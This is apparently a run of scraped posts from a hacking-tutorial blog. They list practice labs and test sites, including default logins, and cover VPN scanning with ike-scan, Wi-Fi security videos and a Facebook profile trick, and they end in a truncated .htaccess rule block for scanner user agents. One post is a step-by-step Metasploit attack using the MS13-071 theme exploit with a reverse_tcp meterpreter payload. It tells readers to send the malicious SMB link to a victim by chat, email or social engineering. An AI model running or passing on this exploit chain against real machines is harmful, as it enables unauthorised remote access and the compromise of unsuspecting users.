<li><b>Hackxor</b> (VMware): <a href="http://hackxor.sourceforge.net/cgi-bin/index.pl">http://hackxor.sourceforge.net/cgi-bin/index.pl</a> (<a href="http://sourceforge.net/projects/hackxor/files/">download</a>) (<a href="http://hackxor.sourceforge.net/cgi-bin/hints.pl">hints&tips</a>)</li><br />
<br />
<li><b>Hacme Bank Prebuilt VM </b>(VMware): <a href="http://ninja-sec.com/index.php/hacme-bank-prebuilt-vmware-image-ninja-sec-com/">http://ninja-sec.com/index.php/hacme-bank-prebuilt-vmware-image-ninja-sec-com/</a> (<a href="http://dc121.4shared.com/download/wwPhUxMQ/hackme_bank_vm_Ninja-Sec.zip">download</a>)</li><br />
<br />
<li><b>Kioptrix4</b> (VMware & Hyper-V): <a href="http://www.kioptrix.com/blog/?p=604">http://www.kioptrix.com/blog/?p=604</a> (<a href="http://www.kioptrix.com/dlvm/Kioptrix4_vmware.rar">download</a>) </li><br />
<br />
<li><b>LAMPSecurity</b> (VMware): <a href="http://sourceforge.net/projects/lampsecurity/">http://sourceforge.net/projects/lampsecurity/</a> (<a href="http://sourceforge.net/projects/lampsecurity/files/">download</a>) (<a href="http://sourceforge.net/projects/lampsecurity/files/Documentation/">doc</a>)</li><br />
<br />
<li><b>Metasploitable</b> (VMware): <a href="http://blog.metasploit.com/2010/05/introducing-metasploitable.html">http://blog.metasploit.com/2010/05/introducing-metasploitable.html</a> (<a href="http://updates.metasploit.com/data/Metasploitable.zip.torrent">download</a> - torrent) (<a href="http://www.metasploit.com/learn-more/how-do-i-use-it/test-lab.jsp">doc</a>)</li><br />
<br />
<li><b>Metasploitable 2</b> (VMware): <br />
<a href="https://community.rapid7.com/docs/DOC-1875">https://community.rapid7.com/docs/DOC-1875</a> (<a href="https://sourceforge.net/projects/metasploitable/files/Metasploitable2/">download</a>)</li><br />
<br />
<li><b>Moth</b> (VMware): <a href="http://www.bonsai-sec.com/en/research/moth.php">http://www.bonsai-sec.com/en/research/moth.php</a> (<a href="http://sourceforge.net/projects/w3af/files/moth/moth/">download</a>)</li><br />
<br />
<li><b>PentesterLab</b> - The Exercises (ISO & PDF): <a href="https://www.pentesterlab.com/exercises/">https://www.pentesterlab.com/exercises/</a> </li><br />
<br />
<li><b>PHDays I-Bank</b> (VMware): <br />
<a href="http://phdays.blogspot.com.es/2012/05/once-again-about-remote-banking.html">http://phdays.blogspot.com.es/2012/05/once-again-about-remote-banking.html</a> (<a href="http://downloads.phdays.com/phdays_ibank_vm.zip">download</a>)</li><br />
<br />
<li><b>Samurai WTF</b> (ISO - list): <a href="http://www.samurai-wtf.org/">http://www.samurai-wtf.org</a> (<a href="http://sourceforge.net/projects/samurai/files/">download</a>)</li><br />
<br />
<li><b>Sauron</b> (Quemu) [<i>Spanish</i>]: <a href="http://sg6-labs.blogspot.com/2007/12/secgame-1-sauron.html">http://sg6-labs.blogspot.com/2007/12/secgame-1-sauron.html</a> (<a href="http://sg6-labs.blogspot.com/search/label/SecGame">solutions</a>)</li><br />
<br />
<li><b>UltimateLAMP</b> (VMware - <a href="http://www.metasploit.com/learn-more/how-do-i-use-it/test-lab.jsp">list</a>): <a href="http://ronaldbradford.com/blog/ultimatelamp-2006-05-19/">http://ronaldbradford.com/blog/ultimatelamp-2006-05-19/</a> (<a href="http://ronaldbradford.com/tmp/UltimateLAMP-0.2.zip">download</a>)</li><br />
<br />
<li><b>Virtual Hacking Lab</b> (ZIP): <a href="http://sourceforge.net/projects/virtualhacking/">http://sourceforge.net/projects/virtualhacking/</a> (<a href="http://sourceforge.net/projects/virtualhacking/files/">download</a>)</li><br />
<br />
<li><b>Web Security Dojo</b> (VMware, VirtualBox - <a href="http://www.mavensecurity.com/web_security_dojo/">list</a>): <a href="http://www.mavensecurity.com/web_security_dojo/">http://www.mavensecurity.com/web_security_dojo/</a> (<a href="http://sourceforge.net/projects/websecuritydojo/files/">download</a>)</li><br />
<br />
You can have a lots of fun time with these so why to waste time download and gets started now .Happy hacking :)Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com1tag:blogger.com,1999:blog-4060165147151547772.post-88864347641259717802014-01-29T23:27:00.000+05:302014-01-29T23:39:24.077+05:30Online | Live Sites For Practice Web Application Hacking Skills :<b>Part1</b>:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-khgFl3c3xco/UulAunCOE9I/AAAAAAAAFYc/VWXjE_qIfkY/s1600/hacker.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="online live site to practice hacking skills" src="http://1.bp.blogspot.com/-khgFl3c3xco/UulAunCOE9I/AAAAAAAAFYc/VWXjE_qIfkY/s1600/hacker.jpg" /></a></div>Here are the list of website that beginners always look for in order furnish their skills,many at various place i encounter where students/new excited security learner ask me "is there any site available to practice all this hacking skills legally?" .<br />
<br />
So here are list of online where you can test your practice its complete safe . next post i will share how you can mount own server on vmware and practice locally from own computer. <br />
<br />
These are few online and live vulnerable web applications available on the Internet to play with.<br />
<br />
<b>Acunetix:</b><br />
<a href="http://testasp.vulnweb.com">http://testasp.vulnweb.com</a> (Forum - ASP)<br />
<a href="http://testaspnet.vulnweb.com">http://testaspnet.vulnweb.com</a> (Blog - .NET)<br />
<a href="http://testphp.vulnweb.com">http://testphp.vulnweb.com</a> (Art shopping - PHP)<br />
<b>Cenzic CrackMeBank:</b> <a href="http://crackme.cenzic.com">http://crackme.cenzic.com</a><br />
<b>Google Gruyere (Python):</b> <a href="http://google-gruyere.appspot.com/start">http://google-gruyere.appspot.com/start</a><br />
<b>Hacking-Lab (eg. OWASP Top 10):</b> <a href="https://www.hacking-lab.com/events/registerform.html?eventid=245">https://www.hacking-lab.com/events/registerform.html?eventid=245</a><br />
<b>Hack.me (beta):</b> <a href="https://hack.me">https://hack.me</a><br />
<b>HackThisSite (HTS - Basic & Realistic (web) Missions):</b> <a href="http://www.hackthissite.org">http://www.hackthissite.org</a><br />
<b>Hackxor online demo:</b> <a href="http://hackxor.sourceforge.net/cgi-bin/login.pl">http://hackxor.sourceforge.net/cgi-bin/login.pl</a> (algo/smurf)<br />
<b>HP/SpiDynamics Free Bank Online: </b><a href="http://zero.webappsecurity.com">http://zero.webappsecurity.com</a> (admin/admin)<br />
<b>IBM/Watchfire AltoroMutual:</b> <a href="http://demo.testfire.net">http://demo.testfire.net</a> (jsmith/Demo1234)<br />
<b>NTOSpider Web Scanner Test Site: </b><a href="http://www.webscantest.com">http://www.webscantest.com</a> (testuser/testpass)<br />
<b>OWASP Hackademic Challenges Project - Live (PHP - Joomla):</b> <a href="http://hackademic1.teilar.gr">http://hackademic1.teilar.gr</a><br />
<b>Pentester Academy:</b> <a href="http://pentesteracademylab.appspot.com">http://pentesteracademylab.appspot.com</a>(One of my fav)<br />
<br />
Enjoy all these different web vulnerable environments and sharp your web app pen-testing skills and tools practicing with them.<br />
On Next part i will post the list downloadable file which you can use for boost your hacking skills Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com2tag:blogger.com,1999:blog-4060165147151547772.post-12104712311633089762014-01-26T21:02:00.001+05:302014-01-26T21:08:23.620+05:30Hack Windows XP PC (Theme Arbitrary Code Execution) with Kali linux<font color="blue"><b>Happy Republic Day to all Indians Proud of being Indian jai Hind!!!</b></font><br />
<br />
So today we will look how an attacker can hack into windows xp system using a Arbitrary code execution vulnerability.We are going to use metasploit that is present on kali Linux or you can do the same with backtrack also. Technical description of the vulnerability is there exist a vulnerability on Microsoft Windows XP and Windows 2003 Operating system on handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the “Screen Saver” tab is viewed.<br />
<br />
Lets carryout the attack Practically here i have used victim machine to windows sp3 and attack to be kali Linux. <br />
so follow it step by step<br />
<li>open terminal in kali Linux and type<b> msfconsole</b>.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-OXLjFy3Y4-E/UuUn4N2uftI/AAAAAAAAFXA/3XjxdFXrURM/s1600/msfconsole.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="msfconsole on kali" src="http://2.bp.blogspot.com/-OXLjFy3Y4-E/UuUn4N2uftI/AAAAAAAAFXA/3XjxdFXrURM/s720/msfconsole.png" height="400" width="580" /></a></div><br />
<li>Now type down following commands one by one<br />
<br />
<li><b>use exploit/windows/fileformat/ms13_071_theme</b><br />
<br />
<li><b>msf exploit (ms13_071_theme)>set payload windows/meterpreter/reverse_tcp</b><br />
<br />
<li><b>msf exploit (ms13_071_theme)>set lhost 192.168.223.133 </b><br />
(IP of your Kali machine to know type <b>ifconfig</b> on new terminal)<br />
<li><b>msf exploit (ms13_071_theme)>set srvhost 192.168.223.133</b> <br />
<br />
<li><b>msf exploit (ms13_071_theme)>exploit</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-OJ5G_Q_q2to/UuUowNd_H1I/AAAAAAAAFXI/rvm2DTOcDFw/s1600/exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Exploit to hack windows xp system" src="http://1.bp.blogspot.com/-OJ5G_Q_q2to/UuUowNd_H1I/AAAAAAAAFXI/rvm2DTOcDFw/s720/exploit.png" height="400" width="580" /></a></div><br />
once all this done you need to give to your victim <b>\\192.168.1.3:gCzJXDKtJugDsVFC.scr</b> via chat or email or any social engineering technique you can use.once the victim open the url provided by you he will asked for confirmation of opening link .<br />
as soon as victim click run you will have your meterpreter shell open .<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-l09yif0SBog/UuUpr5dVdhI/AAAAAAAAFXY/RpjqtGtasPo/s1600/send+link.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Confirmation for un" src="http://2.bp.blogspot.com/-l09yif0SBog/UuUpr5dVdhI/AAAAAAAAFXY/RpjqtGtasPo/s420/send+link.png" /></a></div>Now you have access to the victims PC. Use “<b>sessions -l</b>” and the Session number to connect to the session. And Now Type “<b>sessions -i ID</b>“ <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-4b-m1_2AkGo/UuUpnKh13XI/AAAAAAAAFXQ/sNeh4eJJcBI/s1600/hacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Hacked into Windows XP system" src="http://2.bp.blogspot.com/-4b-m1_2AkGo/UuUpnKh13XI/AAAAAAAAFXQ/sNeh4eJJcBI/s820/hacked.png" height="500" width="600" /></a></div>Enjoy Hacking Be safe and keep learning .<br />
<br />
<br />
Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com0tag:blogger.com,1999:blog-4060165147151547772.post-51684388621975376732014-01-19T01:16:00.001+05:302014-01-19T01:22:05.352+05:30Google Glass Hacks:Fun and Frightening use Presentation<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-kVXe0lM1bas/UtrZ6E5gS_I/AAAAAAAAFWk/ZA0NiZ0ZcoI/s1600/googleglass.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Google Glass Hacks" src="http://3.bp.blogspot.com/-kVXe0lM1bas/UtrZ6E5gS_I/AAAAAAAAFWk/ZA0NiZ0ZcoI/s1600/googleglass.jpeg" /></a></div>Here is a nice video presented on Google glass hack this technical lecture covers lots of things from machine learning and AI to hardware design and manufacture. Includes demonstrations of applications enabled by an always-on image capturing wearable computer. You'll leave with a clear understanding of the field's status quo, how we got here, and insight into what's around the corner.<br />
Always-on camera enabled wearable computers, like Google Glass and Lambda Hat, enable a variety of slightly creepy, but undeniably useful applications. For the past few months, I've worn a computing device that takes pictures every few seconds. I run facial detection over the image stream, pulling out every face I have seen. Soon, we'll be able to conduct mass facial recognition using this data. Other applications include detecting license plates and automatically uploading them to a public GPS tagged website. This talk will cover the history, state of the art, and future of wearable computing, machine learning, and the privacy implication of this technology.<br />
<br />
Video <br />
======<br />
<iframe width="560" height="315" src="//www.youtube.com/embed/PnXGb7RHXWQ" frameborder="0" allowfullscreen></iframe><br />
<a href="https://events.ccc.de/congress/2013/wiki/Main_Page">Source</a><br />
It do deserve a share with those many useful information and great presentation everyone geek should whatchChandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com0tag:blogger.com,1999:blog-4060165147151547772.post-42626427870049746192014-01-14T03:03:00.003+05:302014-01-14T03:04:55.028+05:30Cyber Crime And Rules On Internet Be Safe<div class="center"><a href="http://2.bp.blogspot.com/-QyHLYeH1EHM/UtRa5pdBk8I/AAAAAAAAFU0/1plHsL7rJV0/s1600/cyber+.jpg"><br />
<img alt="Cyber Crime And Rules" height="399" src="http://2.bp.blogspot.com/-QyHLYeH1EHM/UtRa5pdBk8I/AAAAAAAAFU0/1plHsL7rJV0/s1600/cyber+.jpg" width="520" /><br />
</a><br />
<span>Cyber Crime And Rules That You Should Know</span><br />
</div>As The Days Progresses use of computers and the internet has increased rapidly among people.with the gaining popularity of internet or world wide web there also growth in crime specific to cyber world.people are getting smart enough to steal some one credential and perform various action on that may be consider bank account transaction or hacking into social network. <br />
Everyone who uses the internet is a potential victim. In the enforcement of these criminal offenses, it is imperative to incarcerate the small percentage who are criminal users and to protect the majority of users who are innocent. There is a broad spectrum of computer and internet crimes and they are often covered by both state and federal laws.<br />
<br />
Computer offences can be defined as a crime in which a computer, or a network of computers, are used in the commission of the crime. If an individual takes advantage of the internet in the commission of a crime, this is sometimes called a net-crime.<br />
<br />
The direct victim of a computer crime can either be the computer, or network, itself. These crimes can victimize something independent of the network such as a consumer by simply using a computer during the crime.<br />
<br />
Crimes that target computers specifically include things such as the implementation of computer viruses. Another type of this crime is sometimes referred to as a denial-of-service attack which is aimed at bringing down a particular network. The introduction of malware to a network is also a direct attack on a computer. Examples of malware are trojan horses and spyware. These are forms of unwanted software which infect a computer and are also referred to as a computer contaminant.<br />
Cyber terrorism is a form of this type of crime in which the perpetrator attempts to bring down a large scale computer network to interrupt its users and create panic.<br />
<br />
Examples of computer crimes with independent victims are cyberstalking, identity theft, and phishing.<br />
<br />
Some other common examples that are often publicized in the media are the distribution of child pornography and hate propaganda. Cyber terrorism and those distributing hate propaganda are directly linked because they are often perpetrated by the same organization or organizations with similar goals.<br />
<br />
With such a variety of offenses related to the cyber world, many worry that they will be subject to prosecution if they wander into an inappropriate website or inadvertently spread malware. The truth of the matter is that in the majority of state and federal statutes regulating computer crimes, the laws are written specifically to target those who indicate that they "knowingly" and/or "willingly" perpetrated one of these offenses.<br />
<br />
The agents who investigate these crimes, along with the prosecutor, carry the burden of showing that a person had the intent to commit the computer crime. A knowledgeable criminal lawyer can provide the expertise to defend those who may find themselves prosecuted for something that they did not have the intent to commit.<br />
<br />
So Lets Make the Cyber world Crime Free and Better for ease of Use For Benefit.Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com0tag:blogger.com,1999:blog-4060165147151547772.post-69583843403228818402014-01-05T16:24:00.000+05:302014-01-14T03:09:37.392+05:30Facebook Hack to Make Different Profile Picture and TumbailsHi all here is a small trick that you can use to make your two different Facebook profile picture its just a small photo id related hack that makes it cool lets do it.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-I1BIhxd9hw0/Usk558QQ2iI/AAAAAAAAFUk/sC-0azmsogU/s1600/facebook+hack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-I1BIhxd9hw0/Usk558QQ2iI/AAAAAAAAFUk/sC-0azmsogU/s520/facebook+hack.png" /></a></div><b>Follow it step wise </b> <br />
<br />
<li>ok first of all chose an image that you want to make different profile picture<br />
<br />
<a href="https://www.facebook.com/me/photos_albums">Get your own photo albums</a><br />
It will open your "Profile Pictures" Album , click any picture you want to use as another profile picture.<br />
<br />
<li>After opening(Click) your wished profile image , look at the url and copy the "fbid" value , mine here is : 250571248304537<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-QE0Ka58OZKM/Usk0WTa_5_I/AAAAAAAAFT0/UTjq2z1gurg/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="facebook hack on image change" src="http://2.bp.blogspot.com/-QE0Ka58OZKM/Usk0WTa_5_I/AAAAAAAAFT0/UTjq2z1gurg/s320/1.png" /></a></div><br />
<li>Carefully from here go to your Facebook account , click your profile picture and choice "Edit Thumbnail" .<br />
a pop up window will appear .<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-hlI-H5n7G-k/Usk1PvcYmCI/AAAAAAAAFT8/qC2Svmlz4vg/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-hlI-H5n7G-k/Usk1PvcYmCI/AAAAAAAAFT8/qC2Svmlz4vg/s320/2.png" /></a></div>Now right click and inspect element .<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-NBSZ0zMgTTg/Usk15P19QDI/AAAAAAAAFUE/Ni2viB3L7Bo/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-NBSZ0zMgTTg/Usk15P19QDI/AAAAAAAAFUE/Ni2viB3L7Bo/s320/3.png" /></a></div><li>Here come the important step Scroll down until you reach the code which start with : <br />
<a href="http://4.bp.blogspot.com/-MxWOdFJ7UHw/UtRc9FFjrnI/AAAAAAAAFVA/-b8ce4Bzj7w/s1600/one.png" imageanchor="1" ><img border="0" src="http://4.bp.blogspot.com/-MxWOdFJ7UHw/UtRc9FFjrnI/AAAAAAAAFVA/-b8ce4Bzj7w/s1600/one.png" /></a><br />
Click the left small arrow to open the code and scroll down a bit until you find this code : <br />
<br />
<a href="http://3.bp.blogspot.com/-BCv2BXf-TCc/UtRdDoQxIEI/AAAAAAAAFVI/EI8tomnxu7Y/s1600/12334.png" imageanchor="1" ><img border="0" src="http://3.bp.blogspot.com/-BCv2BXf-TCc/UtRdDoQxIEI/AAAAAAAAFVI/EI8tomnxu7Y/s1600/12334.png" /></a><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-41AngL-oukI/Usk3tsFp4dI/AAAAAAAAFUQ/_j78bhEV2ho/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-41AngL-oukI/Usk3tsFp4dI/AAAAAAAAFUQ/_j78bhEV2ho/s320/4.png" /></a></div><li>and finally Double click on the value to edit it , or right click and choice edit html , paste the fbid value that you copied in step "2" above . <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-4lhECPWUa6s/Usk4L3yGRxI/AAAAAAAAFUY/J8qDEflAkMo/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-4lhECPWUa6s/Usk4L3yGRxI/AAAAAAAAFUY/J8qDEflAkMo/s320/5.png" /></a></div><br />
Click to save the changed , close the "Inspect element" window , Finally click "Save" Volla thats done :).<br />
Thanks a lot keep visiting have fun .Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com1tag:blogger.com,1999:blog-4060165147151547772.post-31877058965977914872013-12-25T23:07:00.000+05:302013-12-25T23:09:59.287+05:30Penetration Testing VPN With Ike Scanner On Backtrack Part-1Hi All As you all know these days many organisation using VPN Quite Actively so we will take a quick look on penetration testing Virtual Private Network Using Ike Scanner On Backtrack.<br />
So there is a myth on everyone mind that VPN Provide Full Protection Against Hacker (Means no hacker can hack :P )...so its never like that if there exist some loop hole than any attacker can hack network against any high security but VPN Does ensure some level of protection..still we will discuss some good and bad point in VPN connection.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Qb7ZSMAmlIs/UrsXs4_dfGI/AAAAAAAAFTg/TIa-jCxFpuc/s1600/vpn-service.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Penetration Testing VPN Network" src="http://3.bp.blogspot.com/-Qb7ZSMAmlIs/UrsXs4_dfGI/AAAAAAAAFTg/TIa-jCxFpuc/s620/vpn-service.jpg" height="300" width="550" /></a></div>The meaning of doing VPN penetration testing because it help the organisation to baseline (identify the loopholes that exist in the present implementation and modify the configuration accordingly to protect itself from known problems) its current VPN security posture, identify threats and weaknesses, and implement a new security policy that will mitigate risks. <br />
<br />
Penetration Testing A VPN Network Involves several phases those are :-<br />
<br />
<li>Scanning or identifying the VPN gateway.<br />
<li>Fingerprinting the VPN gateway for guessing implementation.<br />
<li>PSK mode assessment and PSK sniffing.<br />
<li>Offline PSK cracking.<br />
<li>Checking for default user accounts.<br />
<li>Testing the VPN gateway for vendor specific vulnerabilities.<br />
<br />
this first step you can easily do with tools like <a href="http://www.darksite.co.in/2013/08/nmap-commands-for-hackers-kali.html">nmap</a><br />
Example :-<br />
<blockquote>root@bt:~# <b>nmap -sU -p 500 172.16.21.200</b><br />
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST<br />
Nmap scan report for 172.16.21.200<br />
Host is up (0.00036s latency).<br />
PORT STATE SERVICE<br />
500/udp open isakmp<br />
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)<br />
<br />
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds<br />
</blockquote>Now as you now i have used -sU For Udp Scan And -p is for specifying port to be 500. <br />
<br />
<b>IKE Scan Tool :-</b><br />
Ike-scan is a simple but powerful command-line tool that is used to find and fingerprint VPN gateways. It sends specially crafted IKE packets to target gateways and enlists any IKE responses that are received. By default, Ike-scan works in main mode, and sends a packet to the gateway with an ISAKMP header and a single proposal with eight transforms inside it.<br />
<br />
Each transform contains a number of attributes like DES or 3DES as the encryption algorithm, SHA or MD5 as the integrity algorithm, a pre-shared key as the authentication type, Diffie-Hellman 1 or 2 as the key distribution algorithm and 28800 seconds as the lifetime.<br />
<br />
Initial VPN discovery with Ike-scan is as shown below:<br />
<blockquote>root@bt:~# ike-scan -M 172.16.21.200<br />
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)<br />
172.16.21.200 Main Mode Handshake returned<br />
HDR=(CKY-R=d90bf054d6b76401)<br />
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)<br />
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)<br />
<br />
Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify<br />
</blockquote>The -M shows each payload in a line, so that the output will be neat and easy to understand. The output can be any of the following:<br />
<br />
<li>0 returned handshake; 0 returned notify: This means the target is not an IPsec gateway.<br />
<li>1 returned handshake; 0 returned notify: This means the target is configured for IPsec and is willing to perform IKE negotiation, and either one or more of the transforms you proposed are acceptable.<br />
<li>0 returned handshake; 1 returned notify: VPN gateways respond with a notify message when none of the transforms are acceptable (though some gateways do not, in which case further analysis and a revised proposal should be tried).<br />
In the example shown, the VPN gateway replies with one returned handshake and the acceptable transform set has these parameters:<br />
<blockquote>Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800<br />
<br />
Custom transform sets can be tried against the target with the <br />
"--trans" switch:<br />
<br />
--trans=(1=1,2=2,3=1,4=2)<br />
</blockquote>where 1=Encryption Algorithm, 2=Hash Algorithm, 3=Authentication Method, 4=Group Description, and 5=Group Type.<br />
<br />
Kindly refer to <a href="http://www.ietf.org/rfc/rfc2409.txt">RFC 2409</a> Appendix A for a complete understanding of transform set values. There are a number of other tools like ipsectrace, ipsecscan, etc., available for IPsec scanning, but undoubtedly Ike-scan is one of the best and a frequently updated tool.<br />
<br />
Vulnerability assessment tools like Nessus, Nexpose, etc, can be used to identify the vulnerabilities of VPN implementations. A full security audit on the target gateway with such types of tools will generate a detailed report with all identified problems and the mitigation steps available.<br />
<br />
Further penetration testing i will post on later tutorial plese leave your comment below if you have any query.Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com1tag:blogger.com,1999:blog-4060165147151547772.post-18296025663385368162013-12-25T15:16:00.002+05:302013-12-25T15:17:23.692+05:30Free Learn Wifi Security With Vivek Ramachandran ( Books | Video Tutorials & Concepts )Hi everyone it really Feel great that Vivek RamaChandran Sir has done an awesome video series of wifi security which makes you clear on most of the concept related to wifi security .past few days i have a great interest on learn wifi security so i found wifi security by vivek sir and let me tells you this video series some contain some quality training material with live practicals and clear cut understanding.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-ZWnr2QHW2iA/UrqnroEwaxI/AAAAAAAAFTI/jdFiIZaBDg0/s1600/free+learn.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="free download wifi hacking videos and books" src="http://1.bp.blogspot.com/-ZWnr2QHW2iA/UrqnroEwaxI/AAAAAAAAFTI/jdFiIZaBDg0/s1600/free+learn.png" /></a></div><b>You must have seen our previous Post </b><br />
<br />
<a href="http://www.darksite.co.in/2013/05/free-download-backtrack-5-wireless.html">Free download BackTrack 5 Wireless Penetration Testing By Vivek Ramachandran</a> Which share free e book by vivek sir.<br />
<br />
<b>let me tell you about some contents about the video series:-</b><br />
<br />
It Contain fully practical with explanation.it is best for penetration testers, security enthusiasts and network administrators.<br />
This video series will take you through a journey in wireless LAN (in)security and penetration testing.it will also teach you very basics of how WLANs work, graduate to packet sniffing and injection attacks, move on to audit infrastructure vulnerabilities, learn to break into WLAN clients and finally look at advanced hybrid attacks involving wireless and applications<br />
<br />
<b>A non-exhaustive list of topics to be taught includes:</b><br />
<br />
<li>Bypassing WLAN Authentication – Shared Key, MAC Filtering, Hidden SSIDs<br />
<li>Cracking WLAN Encryption – WEP, WPA/WPA2 Personal and Enterprise, Understanding encryption based flaws (WEP,TKIP,CCMP)<br />
<li>Attacking the WLAN Infrastructure – Rogues Devices, Evil Twins, DoS Attacks, MITM, Wi-Fi Protected Setup<br />
<li>Advanced Enterprise Attacks – 802.1x, EAP, LEAP, PEAP, EAP-TTLS<br />
<li>Attacking the Wireless Client – Honeypots and Hotspot attacks, Caffe-Latte, Hirte, Ad-Hoc Networks and Viral SSIDs, WiFishing<br />
<li>Breaking into the Client – Metasploit, SET, Social Engineering<br />
<li>Enterprise Wi-Fi Worms, Backdoors and Botnets<br />
<br />
<b>About VivekRamachandran (Author of Book /Trainer):-<br />
</b><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-m1av9AeJqps/UrqodsnCGOI/AAAAAAAAFTQ/u6ulo66ok74/s1600/vivek+sir.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="Vivek Ramachandran" src="http://2.bp.blogspot.com/-m1av9AeJqps/UrqodsnCGOI/AAAAAAAAFTQ/u6ulo66ok74/s1600/vivek+sir.jpg" /></a></div>Vivek has been into Wireless security research since 2003 ,He was also one of the winners of Microsoft Security Shootout contest held in India among a reported 65,000 participants,his work on wireless security has been quoted in BBC online, InfoWorld, MacWorld, The Register, IT World Canada etc. places. He has spoken/trained at top conferences around the world including Blackhat USA and Abu Dhabi, Defcon, Hacktivity, Brucon, ClubHack, SecurityByte, SecurityZone, Nullcon, C0C0n etc.He is best known in the hacker community as the founder of SecurityTube.net where he routinely posts videos on Wi-Fi Security, Assembly Language, Exploitation Technique.<br />
<br />
i think you all security geeks knows him so no need to write more about him.<br />
<br />
<a href="http://securitytube.aircrack-ng.org/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso">Download All Free Video Tutorial</a> (iso File 4.2 GB)<br />
you can also see all video tutorial part wise <a href="http://www.securitytube.net/groups?operation=view&groupId=9">here</a><br />
<br />
TO start up with you need ALFA NETWORK AWUS036NH 2W USB Wireless N Adapte You can easily purchase from<a href="http://www.ebay.com/itm/ALFA-NETWORK-AWUS036NH-2W-USB-Wireless-N-Adapter-WiFi-b-g-N-2000mW-/400611594109?pt=US_USB_Wi_Fi_Adapters_Dongles&hash=item5d464fcf7d"> ebay</a>/amazon .You also need to <a href="http://www.darksite.co.in/2012/05/how-to-install-backtrack-5-r1-in-your.html">set up backtrack</a> on your laptop/pc(<a href="http://www.darksite.co.in/2012/08/how-to-install-vmware-tools-in-backtrack.html">vmweare/virtual box</a>) which i think very easy and i know even a kid can do it.<br />
<br />
So Even i have Started to learn wifi security gone upto 22+ videos and the whole video series contain 45+ Videos so have fun and special thanks to vivek sir _/\_ for making these videos and sharing it for free.Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com0tag:blogger.com,1999:blog-4060165147151547772.post-63409401095089880222013-12-22T03:55:00.001+05:302014-01-14T13:01:03.872+05:30How to Protect your website from web vulnerability Scanners Hello here i come with a small trick but quite useful it can make your website safe from kiddie hackers :P. some time actually new born hackers do use various web scanners like Acunetix, nessus, Openvas & other scanner available at backtrack.so being a web sec guy how can you protect your website from such automated scanner the code is very simple all you need to do is Just add the below given codes to your .htaccess file . <div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-RPof0-1im78/UrYVEu9P77I/AAAAAAAAFS4/3serRHoAdqA/s1600/hacker.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="protect from web vulnerability scanners" src="http://4.bp.blogspot.com/-RPof0-1im78/UrYVEu9P77I/AAAAAAAAFS4/3serRHoAdqA/s620/hacker.png" /></a></div><blockquote>RewriteEngine On<br />
<�IfModule mod_rewrite.c><br />
RewriteCond %{HTTP_USER_AGENT} ^w3af.sourceforge.net [NC,OR]<br />
